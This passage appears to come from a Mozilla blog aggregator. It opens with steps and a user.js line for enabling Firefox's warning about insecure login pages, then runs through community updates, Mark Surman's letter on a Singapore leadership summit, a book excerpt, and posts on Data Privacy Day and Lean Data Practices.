      3. You will get to a page that asks you to promise to be careful. Promise you will be.
      4. The value of the security.insecure_password.ui.enabled preference determines whether or not Firefox warns you about non-secure login pages. You can enable the feature and be warned about non-secure login pages by setting this value to true. You can disable the feature by setting the value to false.
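If you prefer editing a file to clicking through about:config, the same preference can also be set in a user.js file in your Firefox profile directory (user.js is Firefox’s standard mechanism for applying preferences at startup):

```js
// Warn about login forms on non-secure pages (set to false to disable).
user_pref("security.insecure_password.ui.enabled", true);
```

The change takes effect the next time Firefox starts.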

Thank you!

A special thanks to Paolo Amadini and Aislinn Grigas for their implementation and user experience work on this feature!

Support.Mozilla.OrgWhat’s up with SUMO – 28th January

Hello, SUMO Nation!

Starting from this week, we’re moving things around a bit (to keep them fresh and give you more time to digest and reply). The Friday posts are moving to Thursday, and Fridays will be open for guest posts (including yours) – if you’re interested in writing a post for this blog, let me know in the comments.

Welcome, new contributors!

If you just joined us, don’t hesitate – come over and say “hi” in the forums!

Contributors of the week

We salute you!

Don’t forget that if you are new to SUMO and someone helped you get started in a nice way you can nominate them for the Buddy of the Month!

Most recent SUMO Community meeting

The next SUMO Community meeting…

  • is happening on Monday the 1st of February – join us!
  • Reminder: if you want to add a discussion topic to the upcoming meeting agenda:
    • Start a thread in the Community Forums, so that everyone in the community can see what will be discussed and voice their opinion here before Monday (this will make it easier to have an efficient meeting).
    • Please do so as soon as you can before the meeting, so that people have time to read, think, and reply (and also add it to the agenda).
    • If you can, please attend the meeting in person (or via IRC), so we can follow up on your discussion topic during the meeting with your feedback.

Support Forum

  • Today (was/is/will still be for a few hours) a SUMO Day, connected to the release week for Version 44. Keep answering those questions, heroes of the helpful web!

Knowledge Base

  • for Android
    • It’s Firefox 44 Release Week! Join the forum talk about the release.
    • Draft release notes are here.
    • This is a staged rollout using Google Play, addressing the crash rate discussions.
    • IMPORTANT: Android OS versions 3.0 – 3.2.6 (Honeycomb) won’t be supported in a future release of Firefox for Android; when this happens the app will not be visible on the Google Play Store for users of these OS versions. When we have a more definite time frame for this we will publish another post.
  • for iOS
    • 2.0 is still under wraps – thank you for your patience!

That’s it for today, dear SUMOnians! We still have Friday to enjoy, so see you around SUMO and not only… tomorrow!

Air MozillaWeb QA Weekly Meeting, 28 Jan 2016

Web QA Weekly Meeting This is our weekly gathering of Mozilla's Web QA team filled with discussion on our current and future projects, ideas, demos, and fun facts.

Air MozillaReps weekly, 28 Jan 2016

Reps weekly This is a weekly call with some of the Reps to discuss all matters about/affecting Reps and invite Reps to share their work with everyone.

Mark SurmanInspired by our grassroots leaders

Last weekend, I had the good fortune to attend our grassroots Leadership Summit in Singapore: a hands on learning and planning event for leaders in Mozilla’s core contributor community.

We’ve been doing these sorts of learning / planning / doing events with our broader community of allies for years now: they are at the core of the Mozilla Leadership Network we’re rolling out this year. It was inspiring to see the participation team and core contributor community dive in and use a similar approach.

I left Singapore feeling inspired and hopeful — both for the web and for participation at Mozilla. Here is an email I sent to everyone who participated in the Summit explaining why:

As I flew over the Pacific on Monday night, I felt an incredible sense of inspiration and hope for the future of the web — and the future of Mozilla. I have all of you to thank for that. So, thank you.

This past weekend’s Leadership Summit in Singapore marked a real milestone: it was Mozilla’s first real attempt at an event consciously designed to help our core contributor community (that’s you!) develop important skills like planning and dig into critical projects in areas like connected devices and campus outreach all at the same time. This may not seem like a big deal. But it is.

For Mozilla to succeed, *all of us* need to get better at what we do. We need to reach and strive. The parts of the Summit focused on personality types, planning and building good open source communities were all meant to serve as fuel for this: giving us a chance to hone skills we need.

Actually getting better comes by using these skills to *do* things. The campus campaign and connected devices tracks at the Summit were designed to make this possible: to get us all working on concrete projects while applying the skills we were learning in other sessions. The idea was to get important work done while also getting better. We did that. You did that.

Of course, it’s the work and the impact we have in the world that matter most. We urgently need to explore what the web — and our values — can mean in the coming era of the internet of things. The projects you designed in the connected devices track are a good step in this direction. We also need to grow our community and get more young people involved in our work. The plans you made for local campus campaigns focused on privacy will help us do this. This is important work. And, by doing it the way we did it, we’ve collectively teed it up to succeed.

I’m saying all this partly out of admiration and gratitude.  But I’m also trying to highlight the underlying importance of what happened this past weekend: we started using a new approach to participation and leadership development. It’s an approach that I’d like to see us use even more both with our core participation leaders (again, that’s you!) and with our Mozilla Leadership Network (our broader network of friends and allies). By participating so fully and enthusiastically in Singapore, you helped us take a big step towards developing this approach.

As I said in my opening talk: this is a critical time for the web and for Mozilla. We need to simultaneously figure out what technologies and products will bring our values into the future and we need to show the public and governments just how important those values are. We can only succeed by getting better at working together — and by growing our community around the world. This past weekend, you all made a very important step in this direction. Again, thank you.

I’m looking forward to all the work and exploration we have ahead. Onwards!

As I said in my message, the Singapore Leadership Summit is a milestone. We’ve been working to recast and rebuild our participation team for about a year now. This past weekend I saw that investment paying off: we have a team teed up to grow and support our contributor community from around the world. Nicely done! Good things ahead.

The post Inspired by our grassroots leaders appeared first on Mark Surman.

Nathan Froydfor-purpose instead of non-profit

I began talking with a guy in his midforties who ran an investment fund and told me about his latest capital raise. We hit it off while discussing the differences between start-ups on the East and West Coasts, and I enjoyed learning about how he evaluated new investment opportunities. Although I’d left that space a while ago, I still knew it well enough to carry a solid conversation and felt as if we were speaking the same language. Then he asked what I did.

“I run a nonprofit organization called Pencils of Promise.”

“Oh,” he replied, somewhat taken aback. “And you do that full-time?”

More than full-time, I thought, feeling a bit judged. “Yeah, I do. I used to work at Bain, but left to work on the organization full-time.”

“Wow, good for you,” he said in the same tone you’d use to address a small child, then immediately looked over my shoulder for someone new to approach…

On my subway ride home that night I began to reflect on the many times that this scenario had happened since I’d started Pencils of Promise. Conversations began on an equal footing, but the word nonprofit could stop a discussion in its tracks and strip our work of its value and true meaning. That one word could shift the conversational dynamic so that the other person was suddenly speaking down to me. As mad as I was at this guy, it suddenly hit me. I was to blame for his lackluster response. With one word, nonprofit, I had described my company as something that stood in stark opposition to the one metric that his company was being most evaluated by. I had used a negative word, non, to detail our work when that inaccurately described what we did. Our primary driver was not the avoidance of profits, but the abundance of social impact…

That night I decided to start using a new phrase that more appropriately labeled the motivation behind our work. By changing the words you use to describe something, you can change how others perceive it. For too long we had allowed society to judge us with shackling expectations that weren’t supportive of scale. I knew that the only way to win the respect of our for-profit peers would be to wed our values and idealism to business acumen. Rather than thinking of ourselves as nonprofit, we would begin to refer to our work as for-purpose.

From The Promise of a Pencil by Adam Braun.

The Mozilla BlogIt’s International Data Privacy Day: Help us Build a Better Internet

Update your Software and Share the Lean Data Practices

Today is International Data Privacy Day. What can we all do to help ourselves and each other improve privacy on the Web? We have something for everyone:

  • Users can greatly improve their own data privacy by simply updating their software.
  • Companies can increase user trust in their products and user privacy by implementing Lean Data Practices that increase transparency and offer user control.

By taking action on these two simple ideas, we can create a better Web together.

Why is updating important?

Updating your software is a basic but crucial step you can take to help increase your privacy and security online. Outdated software is one of the easiest routes attackers have to your data, because it is prone to vulnerabilities and security holes that may already have been patched in newer versions. Updating can also make your friends and family more secure, because a computer that has been hacked can be used to hack others. Not updating software is like driving with a broken tail light – it might not seem immediately urgent, but it compromises your safety and that of the people around you.

For our part, we’ve tried to make updating Firefox as easy as possible by automatically sending users updates by default so they don’t have to worry about it. Updates for other software may not come automatically, but they are equally important.

Once you complete your updates, share the “I Updated” badge using #DPD2016 and #PrivacyAware and encourage your friends and family to update, too!

Why should companies implement Lean Data Practices?

Today we’re also launching a new way for companies and projects to earn user trust through a simple framework that helps companies think about the decisions they make daily about data. We call these Lean Data Practices, and they center on three questions: how can you stay lean, build in security, and engage your users? The more companies and projects that implement these concepts, the more we as an industry can earn user trust. You can read more in this blog post from Mozilla’s Associate General Counsel Jishnu Menon.

As a nonprofit with a mission to promote openness, innovation and opportunity on the Web, Mozilla is dedicated to putting users in control of their online experiences. That’s why we think about online privacy and security every day and have privacy principles that show how we build it into everything we do. All of us – users and businesses alike – can contribute to a healthy, safe and trusted Web. The more we focus on ways to reach that goal, the easier it is to innovate and keep the Web open and accessible to all. Happy International Data Privacy Day!

Mozilla Open Policy & Advocacy BlogIntroducing Lean Data Practices

At Mozilla, we believe that users trust products more when companies build in transparency and user control. Earned trust can drive a virtuous cycle of adoption, while conversely, mistrust created by even just a few companies can drive a negative cycle that can damage a whole ecosystem.

Today on International Data Privacy Day, we are happy to announce a new initiative aimed at assisting companies and projects of all sizes to earn trust by staying lean and being smart about collecting and using data.

We call these Lean Data Practices.

Lean Data Practices in action

Lean Data Practices are not principles, nor are they a way to address legal compliance; rather, they are a framework to help companies think about the decisions they make about data. They do not prescribe a particular outcome, and they can help even the smallest companies begin building user trust by fostering transparency and user control.

We have designed Lean Data Practices to be simple and direct:

  1. stay lean by focusing on data you need,
  2. build in security appropriate to the data you have and
  3. engage your users to help them understand how you use their data.

We have even created a toolkit to make it easy to implement them.

We use these practices as a starting point for our own decisions about data at Mozilla. We believe that as more companies and projects use Lean Data Practices, the better they will become at earning trust and, ultimately, the more trusted we will all become as an industry.

Please check them out and help us spread the word!